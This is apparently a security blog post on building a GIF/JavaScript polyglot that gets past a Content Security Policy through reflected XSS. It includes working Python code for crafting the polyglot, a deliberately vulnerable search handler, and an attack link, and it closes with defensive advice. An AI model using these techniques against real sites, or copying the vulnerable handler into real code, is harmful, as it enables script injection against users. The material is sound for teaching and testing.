The content of this article was also presented by Sam at the 2016 Unrest Conference.
In the past, allowing clients to upload images to your web application was risky business. Nowadays, profile pictures and cat images are everywhere on the Internet and robust procedures exist for handling image uploads, so we can rest assured they protect us from the nasties. Or can we?
Image polyglots are one way to leverage vulnerabilities in web applications and execute malicious scripts in a victim’s web browser. They have the added bonus of bypassing certain security controls designed to mitigate these script injection attacks. This blog will explain how to build an image polyglot and demonstrate how using one can bypass a server’s Content Security Policy (CSP).
Content Security Policy (CSP)
A CSP is set by the web server in the form of an HTTP response header (Content-Security-Policy) and instructs the user’s browser to only load and execute resources that originate from a whitelisted set of sources. For example, a common CSP ensures the browser only accepts scripts served from your own domain and blocks inline scripts (i.e., scripts embedded directly in other client-side code such as HTML). CSP is a recommended security header for mitigating the damage caused by Cross-Site Scripting vulnerabilities: it narrows the set of places from which a malicious script can be loaded. HTML5 Rocks has a great introduction to Content Security Policy if you would like to learn more.
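To make the whitelisting idea concrete, here is a minimal Python sketch assuming the policy `Content-Security-Policy: script-src 'self'` (with no `'unsafe-inline'`). The `script_allowed` function is a hypothetical toy model of how a browser decides whether a script may run under that one directive; it only compares scheme, host and port and ignores the rest of the CSP matching rules.

```python
from typing import Optional
from urllib.parse import urljoin, urlsplit

# Hypothetical example policy: scripts only from the page's own origin,
# and no 'unsafe-inline', so inline <script> blocks are refused.
CSP_HEADER = ("Content-Security-Policy", "script-src 'self'")

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url: str) -> tuple:
    """Return the (scheme, host, port) origin of an absolute URL."""
    parts = urlsplit(url)
    return (parts.scheme, parts.hostname, parts.port or DEFAULT_PORTS.get(parts.scheme))


def script_allowed(page_url: str, script_src: Optional[str]) -> bool:
    """Toy model of script-src 'self' (not the full CSP algorithm).

    script_src=None stands for an inline script, which 'self' does not allow.
    Anything else is resolved against the page URL and must share its origin.
    """
    if script_src is None:
        return False
    return origin(urljoin(page_url, script_src)) == origin(page_url)
```

For a page at `https://app.example/profile`, an inline script (`None`) is refused, `/uploads/cat.gif` is allowed because it resolves to the same origin, and `https://evil.example/x.js` is refused. Note that the model never asks what kind of file the same-origin URL points at.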
Cross-Site Scripting (XSS)
XSS is one of the most common web application vulnerabilities, and many major websites, including Google, PayPal, eBay, Facebook and the Australian Government’s myGov site, have been found to have XSS vulnerabilities at some point in time. Reflected XSS is a type of attack in which the injected script is reflected back to the victim by the web application rather than being stored on the web server. It is usually triggered when a victim is coerced into clicking a link containing the malicious payload. The malicious script is considered to be ‘inline’ because it is loaded alongside other client-side code such as HyperText Markup Language (HTML), rather than from a dedicated JavaScript (JS) file. CSP can be configured to block inline scripts from executing in the browser, which in theory mitigates the danger of reflected XSS and protects the user.
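A minimal sketch of a reflected XSS sink, using a hypothetical `render_search` handler that echoes a `q` query parameter straight into HTML. The handler name, parameter and URL are illustrative assumptions, not taken from any real application.

```python
from urllib.parse import parse_qs, urlsplit


def render_search(request_url: str) -> str:
    """Hypothetical vulnerable handler: reflects ?q= into the page unescaped."""
    query = parse_qs(urlsplit(request_url).query)  # also percent-decodes values
    term = query.get("q", [""])[0]
    # Deliberate bug: user input is concatenated into HTML without encoding,
    # so any markup in `term` becomes part of the page.
    return f"<html><body><p>Results for {term}</p></body></html>"


# A link the victim might be coerced into clicking (%3C and %3E are < and >).
malicious_link = "https://app.example/search?q=%3Cscript%3Ealert(1)%3C/script%3E"
page = render_search(malicious_link)
# The payload is now an inline <script> block in the response body, which is
# exactly the kind of script a CSP without 'unsafe-inline' refuses to run.
```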
CSP in action — and how to get around it
Take, for example, a web application that allows you to upload and view images and has an aggressive CSP that only permits scripts loaded from the application’s own domain while denying the use of inline scripts. You’ve found a great reflected XSS vulnerability; however, your payload doesn’t execute because it’s inline and blocked by the CSP. You try uploading your payload through the image upload instead, but the web application rejects it because it isn’t a valid image. An image polyglot can help you get around these pesky security controls.
In humans, a ‘polyglot’ is someone who can speak several languages. In the computer world, it means code (or a file) that is valid in several programming languages or formats at once.
Figure 1 and Figure 2 show the same code snippet, which is valid in more than one language. This is polyglot code, and it is the underlying mechanism for the attack detailed in this tech blog.
You have more than likely heard of the Graphics Interchange Format (GIF), the image type with the file extension ‘.gif’. The popular image type was invented in 1987 by Steve Wilhite and updated in 1989, and it has since come into widespread use on the Internet, largely due to its support for animation.
GIF images support a palette of at most 256 colours per frame, which is why GIF images often look poor in quality. Each frame of an animated GIF is stored in its entirety, making the format inefficient for displaying detailed clips any longer than a few seconds. (Incidentally, while the pronunciation is often disputed, I can confirm for you right now it’s pronounced ‘jiff’ after an American brand of peanut butter. No joke.)
The attack this blog will demonstrate only requires knowledge of the ‘Header’, the ‘Logical Screen Descriptor’ (LSD) and the ‘Trailer’. The blocks between the LSD and the trailer (an optional global colour table, optional extension blocks and the data for each frame) make up the picture itself, and a valid GIF is expected to contain at least one frame. Every GIF begins with a six-byte header: the signature ‘GIF’ followed by the version, either ‘87a’ or ‘89a’.
The seven bytes following the header make up the LSD, which informs the image decoder of properties that affect the whole image. The first four of these bytes hold the canvas width and height, each stored as an unsigned 16-bit integer. A ‘16-bit unsigned integer’ is a whole number between 0 and 65,535 that cannot be negative (it wouldn’t make much sense to have a negative canvas size!). The remaining three bytes hold a packed field of flags (including whether a global colour table follows), the background colour index and the pixel aspect ratio.
It is also important to understand that multi-byte values in the GIF format are stored in ‘little-endian’ order, which means the least significant byte comes first. In Figure 6 we can see the canvas size bytes are width: ‘0A00’ and height: ‘0A00’. While this seems backwards to humans, little-endian order means the decoder treats the first byte as the low byte, so the values are width: ‘000A’ and height: ‘000A’, which is 10 by 10 pixels. Lastly, the trailer (sometimes referred to as the footer) of the image is the single hexadecimal byte ‘3B’, which represents a semicolon in ASCII.
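The header and LSD layout described above can be read with Python’s standard `struct` module, where the `<` prefix selects little-endian byte order. This is a minimal sketch: `parse_gif_prefix` is a hypothetical helper name, and the sample bytes only reproduce the 10 by 10 canvas described for Figure 6; the version and the last three LSD bytes are assumed values.

```python
import struct


def parse_gif_prefix(data: bytes) -> dict:
    """Parse the 6-byte header and 7-byte Logical Screen Descriptor of a GIF."""
    signature, version = data[:3], data[3:6]
    if signature != b"GIF" or version not in (b"87a", b"89a"):
        raise ValueError("missing GIF87a/GIF89a header")
    # '<' = little-endian; H = unsigned 16-bit (0..65535); B = unsigned byte.
    width, height, packed, bg_index, aspect = struct.unpack_from("<HHBBB", data, 6)
    return {
        "version": version.decode("ascii"),
        "width": width,
        "height": height,
        "has_global_colour_table": bool(packed & 0x80),
        "background_index": bg_index,
        "aspect_ratio": aspect,
    }


# Header plus an LSD whose width and height bytes are both 0A 00 (as in Figure 6).
# Assumed: version 89a, no global colour table, background index 0, ratio 0.
sample = b"GIF89a" + bytes([0x0A, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00])
info = parse_gif_prefix(sample)
assert (info["width"], info["height"]) == (10, 10)
# The GIF trailer byte 0x3B is the ASCII semicolon.
assert bytes([0x3B]) == b";"
```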
Most image decoders, including browsers, will ignore anything after the trailing semicolon, making it a good place to put the bulk of our JS payload. However, if the web application manipulates the image, data after the semicolon will likely be discarded. Hence, it’s important that we can still access the raw, unedited image after it’s uploaded to the server; see the ‘limitations’ section of this blog for more information.
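To see why appended bytes are invisible to a decoder, the following sketch walks a GIF’s blocks in order, the way a decoder does, and splits the file at the trailer it reaches. `split_at_trailer` is a hypothetical helper: it understands the standard block types (extensions, image descriptors, colour tables, data sub-blocks) but does no decompression or error recovery. Because a 0x3B byte can also occur inside colour tables or compressed image data, the trailer has to be found by walking blocks rather than by searching for the first semicolon.

```python
from typing import Tuple


def split_at_trailer(data: bytes) -> Tuple[bytes, bytes]:
    """Walk GIF blocks in order and split the file at the trailer (0x3B).

    Returns (image_bytes, trailing_bytes). Raises ValueError on an unknown
    block type; truncated input raises IndexError.
    """
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF87a/GIF89a file")
    packed = data[10]  # LSD packed field (after width and height)
    pos = 13  # 6-byte header + 7-byte Logical Screen Descriptor
    if packed & 0x80:  # global colour table: 2**(N+1) RGB triples
        pos += 3 * (2 << (packed & 0x07))
    while True:
        block = data[pos]
        pos += 1
        if block == 0x3B:  # trailer: a decoder stops reading here
            return data[:pos], data[pos:]
        if block == 0x21:  # extension introducer, then a one-byte label
            pos += 1
        elif block == 0x2C:  # image descriptor: 9 more bytes
            img_packed = data[pos + 8]
            pos += 9
            if img_packed & 0x80:  # optional local colour table
                pos += 3 * (2 << (img_packed & 0x07))
            pos += 1  # LZW minimum code size
        else:
            raise ValueError(f"unexpected block 0x{block:02X} at offset {pos - 1}")
        # Skip data sub-blocks: each is a length byte plus data; 0 ends the run.
        while data[pos] != 0:
            pos += data[pos] + 1
        pos += 1
```

Run against a GIF with text appended after its trailer, the first return value is the untouched image and the second is exactly the appended text, which is the part a browser’s image decoder never looks at.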
Creating the GIF/JS Polyglot
To create our malicious image, we use a small, non-animated GIF image, as seen in Figure 7. Its ASCII-encoded output is represented below:
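As a stand-in for the image in Figure 7 (whose exact bytes are not reproduced here), this sketch assembles a well-known minimal 1 by 1 pixel GIF89a from its parts with `struct`. The byte values are an assumption chosen for brevity, not the author’s image; the names are illustrative.

```python
import struct

HEADER = b"GIF89a"
# Logical Screen Descriptor: width=1, height=1, packed=0x80 (global colour
# table present, 2 entries), background colour index 0, aspect ratio 0.
LSD = struct.pack("<HHBBB", 1, 1, 0x80, 0, 0)
GLOBAL_COLOUR_TABLE = bytes([0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00])  # white, black
# Image descriptor: ',' separator, left=0, top=0, width=1, height=1, no local table.
IMAGE_DESCRIPTOR = b"," + struct.pack("<HHHHB", 0, 0, 1, 1, 0)
# LZW minimum code size 2, one 2-byte sub-block (clear, pixel 0, end), terminator.
IMAGE_DATA = bytes([0x02, 0x02, 0x44, 0x01, 0x00])
TRAILER = b";"  # 0x3B

TINY_GIF = HEADER + LSD + GLOBAL_COLOUR_TABLE + IMAGE_DESCRIPTOR + IMAGE_DATA + TRAILER
print(len(TINY_GIF))  # 35
```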
One way to create a GIF/JS polyglot is to manipulate the LSD so that it begins a JS comment block, as seen in Figure 9. After the GIF trailer, we close the comment block and include our payload.
You will notice that, to insert the ‘/*’ (begin comment block) JS token, we have changed the first two bytes of the LSD, which hold the canvas width. The hexadecimal value of ‘/*’ is ‘2F 2A’, which the image decoder reads in little-endian order as ‘2A 2F’ = 10799. While we still have a valid GIF image, it has a pretty wacky canvas size, as seen in the output below:
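The LSD manipulation described above can be sketched in a few lines of Python. `make_polyglot` and `canvas_width` are hypothetical helpers: the sketch assumes the input GIF ends with its trailer byte and contains no `*/` sequence after the width field (which would close the JS comment early), overwrites the two width bytes with `/*`, and appends `*/=1;` plus the payload after the trailer. The `alert(1);` payload used below is a harmless placeholder of the kind used to prove script execution.

```python
import struct


def make_polyglot(gif: bytes, payload: bytes) -> bytes:
    """Turn a GIF into a GIF/JS polyglot by opening a JS comment in the LSD."""
    if gif[:6] not in (b"GIF87a", b"GIF89a") or not gif.endswith(b";"):
        raise ValueError("expected a complete GIF87a/GIF89a file")
    # Bytes 6-7 are the canvas width; '/*' is 2F 2A, i.e. width 0x2A2F.
    body = gif[:6] + b"/*" + gif[8:]
    if b"*/" in body[8:]:
        raise ValueError("image data contains '*/', which would end the comment early")
    # After the GIF trailer: close the comment, finish 'GIF89a=1;', run payload.
    return body + b"*/=1;" + payload


def canvas_width(gif: bytes) -> int:
    """Read the little-endian canvas width from the LSD."""
    return struct.unpack_from("<H", gif, 6)[0]
```

Applied to a 1 by 1 pixel GIF89a, `canvas_width` on the result returns 10799, and the file ends with the original `;` trailer followed by `*/=1;alert(1);`.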
Other than being oddly sized, the image is still perfectly valid: the image decoder will read the rest of the image data normally and disregard our JS code after the image trailer.
When we execute the image as JS, the engine reads the GIF header (e.g. ‘GIF89a’) as a variable name, ignores everything inside the comment block, and then continues by assigning that variable the value ‘1’. This is just a dummy assignment to keep the JS syntax valid. Then our payload is executed.
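One way to check this reasoning is to remove the block comment and look at what remains. This sketch uses a non-greedy regular expression, which mirrors the JS rule that a block comment ends at the first `*/`; it is not a JS parser and only handles this simple case. The `POLYGLOT` bytes are a hypothetical example built from a 1 by 1 pixel GIF, decoded as Latin-1 purely so that every byte maps to one character.

```python
import re

# Hypothetical polyglot: GIF89a header, '/*' as the canvas width, the rest of a
# 1x1 GIF (ending in the ';' trailer), then '*/=1;' and the payload.
POLYGLOT = (
    b"GIF89a/*\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
    b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00;"
    b"*/=1;alert(1);"
)


def js_view(data: bytes) -> str:
    """Return the source text left after removing /* ... */ block comments."""
    text = data.decode("latin-1")  # every byte maps to exactly one character
    return re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)


print(js_view(POLYGLOT))  # GIF89a=1;alert(1);
```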
The image passes the standard image validation used by many web applications, which often relies on confirming the image’s ‘magic numbers’ (a fancier way of saying the identifying bytes in its header). Once our image is uploaded to the server, we effectively have a valid JS file originating from the web application’s own domain, which the CSP’s whitelist permits.
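The kind of magic-number check described above might look like the following hypothetical `passes_magic_number_check`. It only inspects the first six bytes, so the polyglot’s unchanged header is all it needs to see.

```python
GIF_MAGIC = (b"GIF87a", b"GIF89a")


def passes_magic_number_check(upload: bytes) -> bool:
    """Naive upload filter: accept anything that starts with a GIF header."""
    return upload[:6] in GIF_MAGIC


# Truncated for brevity: a polyglot keeps the real header, then '/*' as the width.
polyglot_prefix = b"GIF89a/*\x01\x00\x80\x00\x00"
plain_script = b"alert(1);"

print(passes_magic_number_check(polyglot_prefix))  # True
print(passes_magic_number_check(plain_script))     # False
```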
As it stands, the web application loads the image with the HTML ‘img’ tag, which tells the browser to interpret the data stream as image data. To circumvent this and trigger our JS code, we leverage our XSS vulnerability to load the same image with an HTML ‘script’ tag whose ‘src’ attribute points at it.
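The difference between the two loading contexts can be shown with a short sketch. `SEARCH_URL`, the `q` parameter and `UPLOAD_PATH` are hypothetical values standing in for a vulnerable search page and the uploaded polyglot; `urlencode` percent-encodes the injected markup so it survives as a query parameter.

```python
from urllib.parse import urlencode

# Hypothetical values: the search page reflects ?q= unescaped, and the
# polyglot was uploaded to this same-origin path.
SEARCH_URL = "https://app.example/search"
UPLOAD_PATH = "/uploads/avatar.gif"

# How the application normally references the file: decoded as image data.
as_image = f'<img src="{UPLOAD_PATH}">'
# What we reflect through the XSS: the same bytes fetched and run as a script.
as_script = f'<script src="{UPLOAD_PATH}"></script>'

# Percent-encode the markup so it can be carried in the reflected parameter.
attack_link = SEARCH_URL + "?" + urlencode({"q": as_script})
print(attack_link)
```

Because the injected tag is an external script from the application’s own origin rather than an inline block, a `script-src 'self'` policy has no reason to refuse it.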
The convenient structure of the GIF file format allows us to reuse the image header and manipulate the canvas size defined in the LSD without breaking the image for the image decoder.
Limitations
- Web applications that restrict image uploads to certain canvas sizes can hinder the effectiveness of an image polyglot. Because only a limited set of JS characters can be placed in the LSD, the resulting canvas sizes are often unusually large (10799 pixels wide with the ‘/*’ approach above) and cannot conform to strict pixel-dimension rules for uploads.
- Server-side image manipulation that resizes the image will rewrite the canvas size in the LSD, corrupting our polyglot. If it’s not possible to locate the original, unedited image through the web application, the image will not execute as JS.
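Both limitations can be illustrated with a short sketch. `MAX_DIMENSION` is a hypothetical upload rule, and `resize_canvas_field` only mimics the one side effect of server-side resizing that matters here (rewriting the LSD width and height); a real image library would also re-encode the pixel data and would likely discard anything after the trailer.

```python
import struct

MAX_DIMENSION = 4096  # hypothetical upload rule, in pixels


def canvas_size(gif: bytes) -> tuple:
    """Read (width, height) from the LSD, little-endian."""
    return struct.unpack_from("<HH", gif, 6)


def within_size_limit(gif: bytes) -> bool:
    width, height = canvas_size(gif)
    return width <= MAX_DIMENSION and height <= MAX_DIMENSION


def resize_canvas_field(gif: bytes, width: int, height: int) -> bytes:
    """Overwrite the LSD width/height, as a resize would."""
    out = bytearray(gif)
    struct.pack_into("<HH", out, 6, width, height)
    return bytes(out)


# Header and LSD of a polyglot: the width bytes are '/*' (10799 pixels).
polyglot_prefix = b"GIF89a/*\x01\x00\x80\x00\x00"

print(canvas_size(polyglot_prefix))        # (10799, 1)
print(within_size_limit(polyglot_prefix))  # False: rejected by the size rule
resized = resize_canvas_field(polyglot_prefix, 100, 100)
print(resized[6:8] == b"/*")               # False: the JS comment opener is gone
```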
While Figure 14 demonstrates a rather mundane script execution, it confirms we now have a method of uploading and executing an XSS attack despite a CSP that blocks inline scripts. The JS stored in our image acts as an uploaded script file, satisfying the CSP’s same-origin requirement.
This attack shows that CSP isn’t a catch-all XSS filter and can be circumvented in some cases. In application penetration testing, GIF/JS polyglots are a powerful tool for demonstrating the consequences of improper output sanitisation.
CSP is still recommended, but it should be implemented with the understanding that it is a last line of defence against XSS attacks, not a guarantee that your web app is protected. Ultimately, secure development processes and proper output encoding are the best way to protect web applications against XSS.
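As a minimal illustration of output encoding, Python’s standard `html.escape` converts `<`, `>`, `&` and (by default) quotes into HTML entities, so reflected input is rendered as text instead of markup. The `render_search_safely` name is hypothetical.

```python
import html


def render_search_safely(term: str) -> str:
    """Reflect a search term into HTML with output encoding applied."""
    return f"<p>Results for {html.escape(term)}</p>"


print(render_search_safely('<script src="/uploads/avatar.gif"></script>'))
# <p>Results for &lt;script src=&quot;/uploads/avatar.gif&quot;&gt;&lt;/script&gt;</p>
```

With the input encoded, the injected tag never reaches the browser as markup, so the polyglot is never loaded as a script in the first place, whatever the CSP says.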
Article by Sam Reid, Security Specialist, Hivint